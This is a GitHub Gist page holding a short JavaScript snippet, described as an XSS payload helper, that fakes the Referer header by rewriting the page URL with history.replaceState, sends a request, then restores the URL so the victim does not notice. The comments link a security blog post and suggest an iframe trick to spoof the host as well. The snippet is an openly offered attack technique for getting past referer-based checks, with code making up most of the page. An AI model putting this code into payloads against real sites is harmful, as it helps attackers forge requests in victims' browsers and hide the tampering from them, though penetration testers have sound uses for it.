Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Code Snippet to Set 'Referer' Header using JavaScript (e.g. XSS Payload)
// Save the current URL path to restore after making
// malicious request with faked referer header value
var savedPath = window.location.pathname;
var savedSearch = window.location.search;
// Change URL/History to control the referer header value
// Swap out "/this-is-my-fake-referer-value" to be what you need
window.history.replaceState(null, '', '/this-is-my-fake-referer-value');
// Send malicious request with faked referer header value
// NOTE: this assumes you're using some xhr request, adjust
// based on whatever your XSS payload is actually doing
xhr.send(body);
// Restore the URL value to the original one before
// the XSS victim notices their location bar changed
window.history.replaceState(null, '', savedPath + savedSearch);
@hoodoer

This comment has been minimized.

Copy link
Owner Author

@hoodoer hoodoer commented Oct 6, 2020

A blog walking through this in use can be found at:
https://www.trustedsec.com/blog/setting-the-referer-header-using-javascript/

@alkanna

This comment has been minimized.

Copy link

@alkanna alkanna commented Feb 7, 2021

Hey @hoodoer, thanks for the great article. Is there a way to similarly modify the host part of the referer using javascript ?
There is a url I need to be able to access directly, however, the target host does not let me access it directly unless the referer is said host.

@hoodoer

This comment has been minimized.

Copy link
Owner Author

@hoodoer hoodoer commented Feb 7, 2021

@alkanna I'm afraid not, just the relative path.

@hoodoer

This comment has been minimized.

Copy link
Owner Author

@hoodoer hoodoer commented Feb 11, 2021

@alkanna, I wonder if you could create an iframe in the page you have running JavaScript, put the needed host into the iframe, and then make the request from that context? I haven't coded that up to try, but might be possible. Would be fun to play with for sure.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment